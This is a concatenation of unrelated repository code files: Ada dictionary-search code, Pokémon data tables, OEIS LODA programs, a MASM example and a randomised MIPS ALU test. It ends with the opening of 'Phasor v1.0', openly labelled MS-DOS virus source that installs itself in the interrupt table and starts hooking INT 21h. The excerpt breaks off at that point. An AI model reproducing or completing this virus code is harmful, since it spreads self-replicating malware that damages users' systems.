Number_Of_Hits + 1; Output_Array (Number_Of_Hits) := Ewds; end if; end Load_Output_Array; --procedure TRIM_OUTPUT_ARRAY is procedure Sort_Output_Array is Hits : Integer := 0; begin -- Bubble sort Hit_Loop : loop Hits := 0; Switch : declare Dw : Ewds_Record := Null_Ewds_Record; begin Inner_Loop : -- Order by RANK, FREQ, SEMI for I in 1 .. Number_Of_Hits - 1 loop if Output_Array (I + 1).Rank > Output_Array (I).Rank or else (Output_Array (I + 1).Rank = Output_Array (I).Rank and then Output_Array (I + 1).Freq < Output_Array (I).Freq) or else (Output_Array (I + 1).Rank = Output_Array (I).Rank and then Output_Array (I + 1).Freq = Output_Array (I).Freq and then Output_Array (I + 1).Semi < Output_Array (I).Semi) then Dw := Output_Array (I); Output_Array (I) := Output_Array (I + 1); Output_Array (I + 1) := Dw; Hits := Hits + 1; --PUT_LINE ("HITS " & INTEGER'IMAGE (HITS)); end if; end loop Inner_Loop; end Switch; exit Hit_Loop when Hits = 0; end loop Hit_Loop; end Sort_Output_Array; procedure Dump_Output_Array (Output : in Ada.Text_IO.File_Type) is De : Dictionary_Entry := Null_Dictionary_Entry; Number_To_Show : Integer := Number_Of_Hits; One_Screen : constant Integer := 6; begin --TEXT_IO.PUT_LINE ("DUMP_OUTPUT"); if Number_Of_Hits = 0 then Ada.Text_IO.Put_Line (Output, "No Match"); else Sort_Output_Array; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT SORTED"); Trimmed := False; if Words_Mode (Trim_Output) then if Number_Of_Hits > One_Screen then Number_To_Show := One_Screen; Trimmed := True; else Number_To_Show := Number_Of_Hits; end if; end if; for I in 1 .. Number_To_Show loop Ada.Text_IO.New_Line (Output); Do_Pause : begin if Integer (Ada.Text_IO.Line (Output)) > Scroll_Line_Number + Config.Output_Screen_Size then Pause (Output); Scroll_Line_Number := Integer (Ada.Text_IO.Line (Output)); end if; end Do_Pause; Dict_IO.Read (Dict_File (General), De, Dict_IO.Count (Output_Array (I).N)); Put (Output, Support_Utils.Dictionary_Form (De)); Ada.Text_IO.Put (Output, " "); if De.Part.Pofs = N then Ada.Text_IO.Put (Output, " "); Decn_Record_IO.Put (Output, De.Part.N.Decl); Ada.Text_IO.Put (Output, " " & Gender_Type'Image (De.Part.N.Gender) & " "); end if; if De.Part.Pofs = V then Ada.Text_IO.Put (Output, " "); Decn_Record_IO.Put (Output, De.Part.V.Con); end if; if (De.Part.Pofs = V) and then (De.Part.V.Kind in Gen .. Perfdef) then Ada.Text_IO.Put (Output, " " & Verb_Kind_Type'Image (De.Part.V.Kind) & " "); end if; if Words_Mdev (Show_Dictionary_Codes) then Ada.Text_IO.Put (Output, " ["); -- FIXME: Why noy Translation_Record_IO.Put ? Age_Type_IO.Put (Output, De.Tran.Age); Area_Type_IO.Put (Output, De.Tran.Area); Geo_Type_IO.Put (Output, De.Tran.Geo); Frequency_Type_IO.Put (Output, De.Tran.Freq); Source_Type_IO.Put (Output, De.Tran.Source); Ada.Text_IO.Put (Output, "] "); end if; if Words_Mdev (Show_Dictionary) then Ada.Text_IO.Put (Output, Ext (D_K) & ">"); end if; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT SHOW"); if Words_Mdev (Show_Dictionary_Line) then Ada.Text_IO.Put (Output, "(" & Trim (Integer'Image (Output_Array (I).N)) & ")"); end if; Ada.Text_IO.New_Line (Output); --TEXT_IO.PUT_LINE ("DUMP_OUTPUT MEAN"); Ada.Text_IO.Put (Output, Trim (De.Mean)); Ada.Text_IO.New_Line (Output); end loop; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT TRIMMED"); if Trimmed then Put_Line (Output, "*"); end if; end if; -- On HITS = 0 exception when others => null; -- If N not in DICT_FILE end Dump_Output_Array; begin J1 := 1; J2 := Size (Ewds_File); First_Try := True; Second_Try := True; J := (J1 + J2) / 2; Binary_Search : loop -- TEXT_IO.PUT_LINE ("J = " & INTEGER'IMAGE (INTEGER (J))); if (J1 = J2 - 1) or (J1 = J2) then if First_Try then J := J1; First_Try := False; elsif Second_Try then J := J2; Second_Try := False; else exit Binary_Search; end if; end if; -- Should D_K Set_Index (Ewds_File, J); Read (Ewds_File, Ewds); if "<"(Lower_Case (Ewds.W), Input_Word) then -- Not LTU, not u=v J1 := J; J := (J1 + J2) / 2; elsif ">"(Lower_Case (Ewds.W), Input_Word) then J2 := J; J := (J1 + J2) / 2; else for I in reverse J1 .. J loop Set_Index (Ewds_File, Ewds_Direct_Io.Count (I)); Read (Ewds_File, Ewds); -- Reads and advances index!! if "="(Lower_Case (Ewds.W), Input_Word) then Load_Output_Array (Ewds); else exit; end if; end loop; for I in J + 1 .. J2 loop Set_Index (Ewds_File, Ewds_Direct_Io.Count (I)); Read (Ewds_File, Ewds); if "="(Lower_Case (Ewds.W), Input_Word) then Load_Output_Array (Ewds); else exit Binary_Search; end if; end loop; exit Binary_Search; end if; end loop Binary_Search; if Words_Mode (Write_Output_To_File) then Dump_Output_Array (Output); else Dump_Output_Array (Current_Output); end if; exception when others => Ada.Text_IO.Put_Line ("exception SEARCH NUMBER_OF_HITS = " & Integer'Image (Number_Of_Hits)); raise; end Words_Engine.Search_English;

data/pokemon/base_stats/bibarel.asm

TastySnax12/pokecrystal16-493-plus

2

83761

<reponame>TastySnax12/pokecrystal16-493-plus<filename>data/pokemon/base_stats/bibarel.asm db 0 ; species ID placeholder db 79, 85, 60, 71, 55, 60 ; hp atk def spd sat sdf db NORMAL, WATER ; type db 127 ; catch rate db 144 ; base exp db BERRY, GOLD_BERRY ; items db GENDER_F50 ; gender ratio db 100 ; unknown 1 db 15 ; step cycles to hatch db 5 ; unknown 2 INCBIN "gfx/pokemon/bibarel/front.dimensions" db 0, 0, 0, 0 ; padding db GROWTH_MEDIUM_FAST ; growth rate dn EGG_GROUND, EGG_WATER_1 ; egg groups ; tm/hm learnset tmhm HEADBUTT, CURSE, ROLLOUT, TOXIC, ZAP_CANNON, ROCK_SMASH, HIDDEN_POWER, SUNNY_DAY, SNORE, BLIZZARD, HYPER_BEAM, ICY_WIND, PROTECT, RAIN_DANCE, ENDURE, FRUSTRATION, IRON_TAIL, THUNDER, RETURN, DIG, SHADOW_BALL, MUD_SLAP, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SWIFT, DEFENSE_CURL, REST, ATTRACT, THIEF, FURY_CUTTER, CUT, SURF, STRENGTH, WHIRLPOOL, WATERFALL, THUNDERBOLT, ICE_BEAM ; end

programs/oeis/013/A013755.asm

neoneye/loda

22

104685

<reponame>neoneye/loda ; A013755: a(n) = 14^(3*n + 2). ; 196,537824,1475789056,4049565169664,11112006825558016,30491346729331195904,83668255425284801560576,229585692886981495482220544,629983141281877223603213172736,1728673739677471101567216945987584 mov $1,2744 pow $1,$0 sub $1,1 mul $1,196 add $1,196 mov $0,$1

Examples/ch10/HelloNew.asm

satadriver/LiunuxOS_t

0

24456

TITLE Macro Functions (HelloNew.asm) ; This program shows how to use macros to configure ; a program to run on multiple platforms. ; Last update: 8/16/01. INCLUDE Macros.inc IF IsDefined( RealMode ) INCLUDE Irvine16.inc ELSE INCLUDE Irvine32.inc ENDIF .code main PROC Startup mWriteLn "This program can be assembled to run " mWriteLn "in both Real mode and Protected mode." exit main ENDP END main

programs/oeis/161/A161416.asm

neoneye/loda

22

105147

<reponame>neoneye/loda ; A161416: Partial sums of A056737. ; 0,1,3,3,7,8,14,16,16,19,29,30,42,47,49,49,65,68,86,87,91,100,122,124,124,135,141,144,172,173,203,207,215,230,232,232,268,285,295,298,338,339,381,388,392,413,459,461,461,466,480,489,541,544,550,551,567,594 mov $2,$0 mov $3,$0 lpb $2 mov $0,$3 sub $2,1 sub $0,$2 seq $0,56737 ; Minimum nonnegative integer m such that n = k*(k+m) for some positive integer k. add $1,$0 lpe mov $0,$1

oeis/040/A040006.asm

neoneye/loda-programs

11

85334

; A040006: Continued fraction for sqrt(10). ; Submitted by <NAME> ; 3,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6 min $0,1 add $0,1 mul $0,3

programs/oeis/120/A120891.asm

jmorken/loda

1

28141

<filename>programs/oeis/120/A120891.asm ; A120891: Number of primitive Pythagorean triangles with odd leg 2n-1. ; 0,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,2,1,2,1,1,2,1,1,2,1,2,2,1,1,2,2,1,2,1,1,2,2,1,1,1,2,2,1,2,2,2,1,2,1,1,4,1,1,2,1,2,2,2,1,2,1,1,2,1,2,2,1,1,2,2,2,2,1,1,2,2,1,2,2,1,4,1,1,2,1,2,2,1,1,2,2,2,2,1,1,4,1,1,2,2,2,2,2,1,2,2,2,2,2,1,2,1,1,4,1,2,2,1,1,1,2,2,2,1,2,4,1,2,2,1,2,2,1,1,4,2,1,2,1,1,4,2,1,2,1,2,2,2,2,2,2,1,2,1,1,4,1,2,2,2,2,2,2,1,2,2,1,2,2,1,4,1,1,2,1,2,4,1,1,2,2,1,2,2,1,2,2,1,2,1,4,2,1,2,2,2,1,4,1,2,2,2,1,2,2,2,2,1,1,2,2,2,4,1,1,4,2,1,2,1,2,2,1,2,2,4,1,2,1,1,4,1,2,2,2,2,2,1,2,4,2,1,2,1,2,4,2,1 mul $0,2 cal $0,34444 ; a(n) is the number of unitary divisors of n (d such that d divides n, gcd(d, n/d) = 1). mov $1,$0 div $1,2 sub $1,1 mul $1,2 add $1,2 div $1,2

P6/data_P6_2/ALUTest145.asm

alxzzhou/BUAA_CO_2020

1

28279

<gh_stars>1-10 addiu $0,$3,2556 sltiu $1,$5,-16531 srl $4,$4,24 sltu $1,$5,$3 lb $3,13($0) xori $1,$1,15331 slt $1,$1,$3 or $1,$3,$3 lh $3,6($0) lh $3,6($0) slt $0,$0,$3 addiu $3,$3,-16857 slti $1,$3,10310 ori $5,$5,41522 ori $5,$3,12904 addu $4,$4,$3 subu $3,$3,$3 or $4,$6,$3 lb $3,4($0) lbu $1,12($0) addiu $6,$4,-15701 sll $4,$3,5 lh $4,0($0) xori $3,$3,8082 xor $5,$1,$3 xori $4,$4,26387 sltiu $5,$5,-4691 ori $3,$4,65095 subu $3,$5,$3 sw $3,12($0) sltu $1,$1,$3 addiu $3,$5,-22526 sra $6,$5,26 sltiu $4,$4,-24596 addiu $3,$1,18230 sll $5,$3,6 srav $4,$4,$3 lbu $0,11($0) sb $3,9($0) lhu $4,8($0) xori $4,$4,52650 sb $3,9($0) lh $4,2($0) slti $1,$0,21653 srlv $1,$1,$3 subu $4,$6,$3 srav $5,$5,$3 addiu $3,$3,-17634 lhu $5,12($0) addiu $3,$4,-30104 sll $3,$6,1 slt $1,$3,$3 slt $1,$5,$3 lhu $3,14($0) srl $3,$3,8 addu $3,$5,$3 lh $1,0($0) srl $4,$4,6 sra $5,$0,11 addu $5,$3,$3 xor $5,$4,$3 xor $5,$5,$3 slt $3,$4,$3 lhu $1,4($0) addu $3,$3,$3 addiu $3,$6,21720 lh $3,4($0) sh $3,10($0) subu $6,$5,$3 srl $2,$2,13 andi $5,$5,57227 nor $5,$5,$3 lb $6,7($0) sra $5,$6,11 lb $4,10($0) sltiu $3,$4,8839 addu $1,$1,$3 andi $3,$3,58816 sltiu $3,$6,-22354 srav $3,$3,$3 sltiu $4,$4,-7269 xor $1,$1,$3 lb $4,6($0) xor $4,$4,$3 or $1,$3,$3 subu $0,$4,$3 lb $0,8($0) or $3,$5,$3 sltu $5,$5,$3 sh $4,4($0) lhu $5,12($0) xori $5,$0,63817 sllv $3,$3,$3 addiu $3,$4,22359 sb $3,3($0) lbu $2,8($0) nor $3,$3,$3 srl $4,$2,21 addu $3,$3,$3 addiu $1,$1,-14114 sra $3,$6,19 slti $3,$6,-566 sllv $4,$3,$3 addu $3,$3,$3 nor $0,$3,$3 sltu $5,$5,$3 lw $4,0($0) sw $4,4($0) sb $1,16($0) addiu $3,$3,3193 srlv $1,$1,$3 and $0,$6,$3 sh $4,16($0) sra $0,$5,12 xori $1,$3,23781 xori $4,$1,53096 andi $4,$3,15200 andi $5,$5,43847 nor $3,$5,$3 sll $0,$2,7 subu $4,$3,$3 xor $1,$3,$3 and $3,$3,$3 sra $6,$6,27 and $0,$1,$3 and $1,$1,$3 andi $3,$3,15497 addu $5,$3,$3 sltiu $1,$4,3022 lhu $3,16($0) addu $4,$0,$3 srav $1,$4,$3 sb $5,0($0) ori $5,$5,27067 sw $5,12($0) sra $0,$3,30 nor $5,$5,$3 sh $4,16($0) subu $4,$4,$3 sh $4,16($0) lhu $4,12($0) srlv $3,$4,$3 lhu $3,6($0) lb $4,10($0) subu $4,$4,$3 subu $3,$4,$3 sll $6,$6,15 addiu $3,$3,5309 sll $3,$4,16 addiu $1,$0,9487 sra $3,$3,3 addu $4,$2,$3 sltu $4,$2,$3 sra $3,$4,8 xori $3,$4,39702 srlv $1,$1,$3 sw $5,16($0) addu $4,$4,$3 lw $3,12($0) lh $5,4($0) addu $5,$5,$3 lbu $6,6($0) lbu $6,16($0) srlv $3,$3,$3 sll $1,$4,22 subu $4,$3,$3 sra $6,$5,25 sw $3,12($0) sll $4,$4,8 sltu $0,$0,$3 lh $0,12($0) slt $3,$4,$3 lbu $4,14($0) addu $4,$4,$3 subu $4,$4,$3 sb $6,16($0) andi $4,$4,59812 andi $1,$3,46230 srlv $4,$3,$3 subu $3,$3,$3 subu $3,$1,$3 subu $4,$6,$3 xor $4,$4,$3 sw $5,12($0) sh $3,6($0) andi $4,$4,60881 andi $4,$3,47698 addu $3,$5,$3 addiu $5,$5,-24859 subu $6,$4,$3 addiu $3,$3,6143 srl $3,$6,22 subu $3,$3,$3 and $4,$3,$3 or $0,$3,$3 sll $0,$0,20 sltiu $5,$4,-18311 ori $1,$5,41361 lh $5,12($0) sltiu $1,$3,21037 lb $3,5($0) sllv $1,$1,$3 addu $3,$5,$3 sh $3,14($0) lw $4,4($0) or $3,$4,$3 and $3,$5,$3 sllv $5,$3,$3 srav $3,$3,$3 or $1,$5,$3 sllv $5,$3,$3 srlv $3,$4,$3 addu $6,$3,$3 sltiu $1,$1,22869 sh $4,4($0) xori $3,$6,40283 sllv $4,$4,$3 lh $5,12($0) lw $5,0($0) srav $3,$6,$3 sltiu $1,$6,-24230 and $3,$4,$3 or $3,$3,$3 slt $4,$3,$3 sltiu $1,$4,-15842 sll $4,$6,21 subu $4,$1,$3 srl $1,$4,8 srl $4,$3,28 srav $6,$6,$3 and $1,$1,$3 sllv $3,$3,$3 nor $1,$6,$3 addiu $3,$3,25001 sra $3,$1,0 lbu $3,3($0) addu $1,$2,$3 addu $5,$5,$3 sra $4,$4,22 slt $3,$3,$3 sltu $3,$4,$3 andi $1,$3,33704 xori $1,$6,51442 sltiu $4,$2,-26021 ori $1,$5,39805 sltu $3,$1,$3 sw $1,4($0) and $4,$4,$3 sw $3,16($0) andi $4,$4,42227 xori $4,$3,1060 srlv $5,$3,$3 sh $5,6($0) slti $3,$4,-21697 subu $5,$3,$3 sb $5,5($0) sb $5,4($0) xor $5,$3,$3 addiu $3,$1,-12493 slti $3,$1,30556 lh $3,6($0) srlv $1,$4,$3 sltiu $3,$3,-12437 sltiu $4,$1,-25351 andi $5,$6,62771 srav $3,$3,$3 xori $5,$4,17219 sltu $0,$3,$3 srlv $3,$4,$3 slti $5,$1,10402 addu $1,$3,$3 addiu $0,$3,-17700 lh $3,12($0) addiu $0,$0,-8928 addiu $3,$3,-24765 lb $6,8($0) nor $5,$5,$3 sb $4,3($0) addu $3,$2,$3 xor $3,$5,$3 slti $0,$4,-4081 sb $5,2($0) sllv $4,$5,$3 sllv $5,$0,$3 srav $1,$4,$3 lbu $3,1($0) nor $4,$3,$3 and $1,$3,$3 lb $3,10($0) addiu $5,$1,-22387 sllv $6,$3,$3 slt $3,$0,$3 ori $3,$3,24643 ori $4,$4,15453 or $4,$4,$3 lhu $4,10($0) lhu $3,4($0) srl $4,$6,12 srav $6,$4,$3 srlv $4,$4,$3 lbu $4,15($0) sltiu $5,$3,-11831 lw $4,8($0) sltu $3,$3,$3 addu $3,$3,$3 sb $3,0($0) lw $5,12($0) lb $4,14($0) xori $5,$3,41513 nor $3,$6,$3 and $4,$5,$3 lb $3,9($0) addu $4,$4,$3 lh $5,6($0) addu $4,$1,$3 sw $4,8($0) addiu $1,$3,-29814 xor $0,$0,$3 subu $5,$4,$3 lbu $3,16($0) xor $3,$3,$3 sb $0,2($0) sh $1,2($0) addu $4,$4,$3 lh $6,14($0) xori $4,$4,15311 addiu $4,$3,-30806 lhu $3,10($0) and $3,$3,$3 andi $4,$0,43581 or $3,$4,$3 subu $3,$5,$3 subu $5,$4,$3 lh $3,12($0) slti $4,$4,10734 and $4,$4,$3 lh $4,16($0) sllv $3,$3,$3 or $3,$3,$3 slti $2,$2,-24283 addu $4,$6,$3 sll $5,$5,18 subu $3,$3,$3 slt $1,$5,$3 lw $4,16($0) srav $4,$1,$3 srlv $5,$1,$3 or $3,$4,$3 addiu $4,$4,22679 xori $4,$1,541 xori $3,$3,3035 lbu $1,9($0) sw $4,8($0) lbu $1,8($0) lbu $5,16($0) srlv $4,$4,$3 ori $4,$4,14183 lh $3,14($0) addiu $3,$5,31761 xor $4,$5,$3 sll $1,$1,22 sltu $3,$3,$3 addiu $3,$4,-19653 ori $3,$5,35370 subu $5,$4,$3 andi $3,$0,27240 lhu $4,10($0) xor $4,$4,$3 srlv $3,$6,$3 nor $5,$1,$3 slti $5,$5,28802 subu $3,$3,$3 sltiu $4,$0,10787 sll $3,$1,26 ori $0,$3,13064 xori $3,$3,50283 lbu $4,16($0) sltu $4,$1,$3 sw $1,0($0) xori $0,$0,57189 subu $6,$6,$3 slt $5,$3,$3 addu $6,$6,$3 sh $6,16($0) addu $5,$1,$3 subu $5,$5,$3 and $0,$4,$3 srl $3,$3,20 sllv $1,$1,$3 sllv $4,$4,$3 addu $3,$1,$3 sw $4,0($0) subu $5,$3,$3 lh $4,16($0) ori $5,$1,61496 xor $3,$3,$3 nor $3,$6,$3 nor $4,$4,$3 subu $6,$1,$3 subu $3,$2,$3 slti $3,$4,-15046 xori $4,$3,7521 lw $3,8($0) andi $4,$3,34761 xori $6,$3,59914 sllv $5,$6,$3 sltiu $5,$5,15739 xori $1,$1,39839 srl $5,$1,24 andi $4,$0,36448 sw $3,4($0) slti $3,$2,-25751 subu $6,$3,$3 subu $4,$5,$3 nor $3,$2,$3 srav $3,$3,$3 subu $4,$5,$3 lhu $3,8($0) addiu $3,$5,12331 ori $1,$1,62055 sllv $3,$1,$3 lb $3,6($0) ori $3,$3,49635 xori $0,$0,35734 ori $3,$2,40872 lhu $5,16($0) srav $5,$3,$3 srlv $3,$4,$3 sltu $1,$4,$3 ori $1,$3,8669 addiu $3,$4,24435 lbu $1,6($0) srlv $5,$2,$3 xori $6,$1,7735 sra $3,$3,8 addiu $3,$1,-1862 sll $4,$3,16 and $4,$5,$3 sllv $3,$6,$3 sra $0,$3,20 and $3,$3,$3 lhu $5,8($0) addiu $4,$4,12686 srav $3,$3,$3 nor $3,$3,$3 sll $3,$6,15 ori $1,$4,39575 subu $6,$2,$3 addiu $3,$1,-22725 or $4,$3,$3 lbu $1,9($0) subu $3,$3,$3 lh $0,14($0) sb $4,4($0) sltu $5,$0,$3 srav $5,$6,$3 subu $4,$4,$3 srl $1,$3,6 lb $4,1($0) slt $3,$2,$3 subu $3,$4,$3 lhu $4,16($0) nor $3,$3,$3 sb $1,5($0) sltiu $3,$4,11462 xor $6,$0,$3 srl $6,$2,14 sll $3,$4,8 ori $4,$4,26265 xor $3,$4,$3 sh $3,4($0) srav $5,$5,$3 or $3,$5,$3 ori $4,$4,61547 subu $5,$3,$3 andi $3,$0,46574 ori $4,$6,58751 ori $4,$1,3394 sltiu $3,$3,30241 xor $4,$2,$3 and $0,$3,$3 sb $4,4($0) sltiu $0,$5,-27624 addiu $3,$6,-32514 sw $1,8($0) xori $0,$0,39814 andi $5,$3,22112 xori $1,$4,36246 addu $5,$3,$3 sw $5,4($0) slti $1,$6,29483 addu $0,$0,$3 sltiu $5,$3,3008 sw $1,16($0) addu $4,$3,$3 lw $3,8($0) sra $5,$3,15 sltiu $3,$3,-30753 addu $4,$3,$3 lh $5,0($0) addu $1,$6,$3 srl $4,$4,15 xor $0,$0,$3 subu $3,$4,$3 lw $3,16($0) ori $5,$6,29751 sb $5,12($0) lbu $0,2($0) lb $3,4($0) nor $4,$3,$3 srlv $4,$3,$3 nor $3,$4,$3 sltu $0,$3,$3 sw $3,12($0) lw $1,16($0) sra $1,$3,5 slt $1,$3,$3 sltu $5,$2,$3 sra $5,$5,0 srav $4,$3,$3 sltiu $1,$1,-15047 lb $3,14($0) srav $6,$6,$3 srl $3,$0,16 nor $4,$4,$3 sltiu $3,$3,1810 addu $5,$3,$3 subu $1,$4,$3 slt $4,$4,$3 addiu $3,$4,-2794 and $0,$5,$3 addiu $4,$1,11476 sra $4,$1,2 xor $3,$1,$3 sb $0,14($0) sltiu $6,$4,22112 subu $6,$1,$3 sltu $1,$1,$3 lw $3,0($0) sb $0,16($0) ori $6,$1,54316 sltiu $5,$5,14206 sltiu $3,$4,-570 xori $3,$3,56081 srl $4,$5,11 slt $5,$5,$3 nor $4,$3,$3 nor $3,$3,$3 xor $3,$1,$3 andi $1,$0,60988 sw $6,4($0) addiu $3,$1,32291 or $4,$1,$3 srlv $4,$4,$3 slti $3,$5,6852 and $4,$2,$3 xor $4,$5,$3 srav $0,$0,$3 lw $3,16($0) nor $3,$5,$3 andi $5,$5,49388 andi $3,$3,38826 addiu $4,$3,6417 nor $1,$4,$3 lh $4,10($0) subu $3,$6,$3 sw $4,12($0) or $6,$6,$3 lbu $5,11($0) srav $3,$5,$3 lw $5,8($0) sh $4,14($0) nor $0,$1,$3 sw $4,16($0) lbu $0,0($0) xor $3,$1,$3 sltiu $3,$6,8871 lb $3,13($0) xor $3,$5,$3 andi $3,$3,36092 subu $6,$3,$3 xori $1,$3,24692 addiu $0,$6,18613 subu $3,$3,$3 sltiu $0,$0,-26558 sb $1,9($0) nor $5,$1,$3 slt $5,$5,$3 srlv $4,$5,$3 or $0,$5,$3 nor $0,$4,$3 slti $4,$3,32376 srl $4,$4,31 lbu $6,1($0) or $3,$0,$3 sllv $4,$3,$3 lbu $0,2($0) andi $1,$4,8944 sra $3,$3,28 srl $1,$0,19 sb $1,2($0) sltiu $5,$3,9068 nor $3,$6,$3 lb $3,5($0) and $5,$4,$3 ori $3,$3,43831 sltu $3,$5,$3 nor $3,$3,$3 addu $3,$4,$3 subu $5,$5,$3 subu $1,$3,$3 slti $4,$4,-6919 addu $4,$3,$3 lb $4,7($0) addiu $4,$3,-15031 andi $4,$4,50021 addu $6,$3,$3 srlv $0,$4,$3 addu $6,$3,$3 lb $3,0($0) ori $1,$4,62324 sltiu $3,$1,1123 and $4,$1,$3 sra $5,$6,17 lb $1,3($0) lh $5,14($0) sll $1,$5,25 sltu $3,$3,$3 subu $3,$0,$3 slti $4,$4,32510 srl $4,$1,23 andi $1,$6,46597 sra $3,$4,31 sll $5,$6,16 xor $4,$3,$3 subu $3,$4,$3 sltu $1,$3,$3 xori $3,$3,63968 addu $1,$3,$3 ori $6,$6,36061 srav $3,$3,$3 lw $3,16($0) sllv $1,$5,$3 slti $5,$1,-21729 and $4,$5,$3 or $3,$1,$3 lb $3,15($0) and $0,$5,$3 slti $3,$6,30152 addu $4,$5,$3 or $3,$3,$3 xori $5,$1,6306 subu $6,$3,$3 lw $4,12($0) lbu $3,9($0) sh $3,14($0) addu $6,$3,$3 slt $4,$4,$3 xori $4,$4,14 lw $6,0($0) sltu $3,$4,$3 andi $3,$6,48433 sllv $3,$6,$3 lhu $5,14($0) lh $4,6($0) addu $1,$1,$3 ori $3,$5,25745 addu $3,$5,$3 srav $3,$6,$3 addu $1,$4,$3 addu $3,$3,$3 addu $3,$4,$3 slti $4,$4,28936 addu $3,$4,$3 srl $3,$3,16 addu $1,$6,$3 andi $1,$1,51902 addu $3,$4,$3 and $0,$0,$3 addiu $5,$3,-19741 lb $6,15($0) subu $1,$3,$3 xori $3,$3,59552 ori $5,$6,42838 nor $3,$5,$3 ori $3,$5,8463 sltu $3,$6,$3 sltu $5,$4,$3 srl $4,$4,24 xor $5,$6,$3 srl $3,$4,19 srav $3,$3,$3 subu $3,$6,$3 lb $5,5($0) sh $3,4($0) srlv $4,$3,$3 sllv $3,$4,$3 lhu $3,4($0) sllv $3,$5,$3 lw $4,12($0) andi $6,$4,12059 sh $3,14($0) lw $1,0($0) srav $4,$4,$3 lhu $6,2($0) subu $6,$3,$3 lbu $3,2($0) sllv $5,$6,$3 lb $4,5($0) srav $4,$3,$3 and $4,$4,$3 xori $0,$4,44657 lh $1,16($0) sll $3,$3,3 lw $3,16($0) addiu $3,$4,584 lb $6,0($0) sltu $1,$5,$3 subu $3,$2,$3 andi $4,$4,22667 sll $4,$1,22 addu $3,$4,$3 ori $3,$3,60823 addiu $0,$3,-18498 addiu $6,$1,21911 lh $3,16($0) ori $4,$4,2283 lh $3,8($0) lhu $4,10($0) lh $3,14($0) subu $3,$3,$3 subu $3,$3,$3 subu $6,$6,$3 srl $3,$4,17 subu $6,$1,$3 addu $5,$2,$3 lb $5,14($0) or $1,$5,$3 sltu $3,$4,$3 or $5,$3,$3 srl $4,$4,28 subu $3,$1,$3 subu $5,$5,$3 xor $3,$4,$3 srav $6,$6,$3 slt $5,$1,$3 sra $3,$3,25 ori $3,$3,24515 sltu $6,$4,$3 sllv $1,$3,$3 sh $3,10($0) lh $1,4($0) ori $4,$3,6492 addu $3,$5,$3 subu $4,$4,$3 lw $5,0($0) xor $5,$3,$3 addiu $0,$4,4959 sh $4,16($0) sltu $5,$0,$3 addiu $4,$4,-7023 and $0,$0,$3 lbu $3,2($0) andi $0,$3,8063 lw $4,12($0) addu $5,$4,$3 xor $1,$1,$3 lw $6,4($0) lw $3,4($0) subu $3,$5,$3 slti $0,$3,-18770 sltiu $3,$3,31378 sltiu $6,$6,2850 lb $3,13($0) and $3,$5,$3 and $4,$3,$3 andi $1,$1,9874 srav $6,$3,$3 sltu $4,$3,$3 xor $3,$1,$3 or $3,$3,$3 addu $4,$6,$3 xori $1,$5,56604 nor $5,$1,$3 lw $3,8($0) lb $5,15($0) slti $5,$3,1395 xori $5,$3,40194 srlv $1,$6,$3 sltu $5,$5,$3 lbu $0,16($0) andi $5,$0,45947 lhu $1,10($0) srlv $3,$3,$3 slti $4,$4,-3959 subu $5,$5,$3 sh $0,8($0) andi $4,$4,18713 sltiu $3,$3,1715 and $3,$0,$3 sltu $3,$4,$3 addu $4,$3,$3 lw $5,12($0) addiu $0,$1,-8140 lh $6,6($0) slti $5,$4,-226 nor $6,$2,$3 sltiu $4,$3,-924 andi $4,$3,60863 subu $4,$3,$3 subu $2,$2,$3 nor $4,$4,$3 lhu $3,12($0) sltu $5,$1,$3 andi $3,$4,63435 sll $5,$4,6 sltu $1,$4,$3 nor $4,$4,$3 addiu $6,$4,-25072 or $3,$4,$3 sll $4,$1,28 addiu $4,$1,-22469 sw $1,4($0) lbu $6,14($0) sw $5,0($0) sb $5,6($0) xor $3,$3,$3 lw $5,0($0) sb $3,15($0) srav $1,$1,$3 sb $6,5($0) sll $3,$5,10 addu $1,$5,$3 slt $0,$0,$3 addu $3,$4,$3 lhu $4,10($0) sw $1,0($0) or $3,$6,$3 andi $4,$4,50620 andi $0,$6,45345 sllv $1,$6,$3 or $1,$0,$3 sra $4,$4,28 sll $3,$3,30 lw $4,16($0) sb $6,8($0) andi $3,$3,42621 addiu $4,$6,25674 lw $4,12($0) and $4,$3,$3 slt $4,$2,$3 subu $3,$5,$3 addu $3,$3,$3 srav $1,$4,$3 slti $5,$1,11823 slti $3,$3,18587 lw $0,8($0) addiu $4,$4,31688 srlv $4,$6,$3 lw $5,8($0) xori $4,$4,58381 lhu $0,6($0) nor $4,$4,$3 lhu $1,14($0) andi $5,$5,43530 lbu $1,14($0) addiu $3,$3,-1339 addu $5,$4,$3 and $4,$2,$3 xori $6,$1,15489 lhu $4,12($0) srl $3,$3,27 xori $3,$3,46829 srlv $1,$2,$3 sltu $4,$4,$3 slti $1,$6,-4097 lbu $4,2($0) sltiu $4,$4,13919 lb $0,5($0) xori $4,$0,16344 andi $1,$1,34176 sra $4,$3,20 xor $3,$0,$3 srav $5,$5,$3 sra $4,$1,14 sw $6,0($0) srav $1,$3,$3 lbu $5,10($0)

MSDOS/Virus.MSDOS.Unknown.phasor10.asm

fengjixuchui/Family

3

247172

; ; [Phasor] v1.0 ; Written by Memory Lapse of Phalcon/Skism ; ; This is a simple memory resident, COM infector. It hides in the unused ; portion of the interrupt table starting at 0:1E0h. ; ; To Assemble: ; TASM [PHASOR10]/m2 - TLINK [PHASOR10]/T ; .model tiny ; .code ; .286 ; org 100h ; ; start: ;Mark Start of Code v_start: ;Mark Start of Virus mov bp,0000h ;Self Modifying Delta delta equ $-002h ; Offset. ; xor di,di ;Load Register w/Zero mov es,di ;ES = 000h ; mov di,01E0h ;DI = 1E0h ; cmp byte ptr es:[di],0BDh ;Virus Present? jz restoreCOMbytes ;(0BDh = MOV BP,XXXX) ; push cs ;Save CS onto Stack pop ds ;Restore DS (CS=DS) ; mov cx,(heap_end-v_start)/002h ;CX = # of Words To Copy lea si,[bp+100h] ;SI = Start of Virus rep movsw ;Copy Virus To Int Table ; mov ax,offset i021h+0E0h ;AX = Handler + Offset ; xchg ax,word ptr es:[084h] 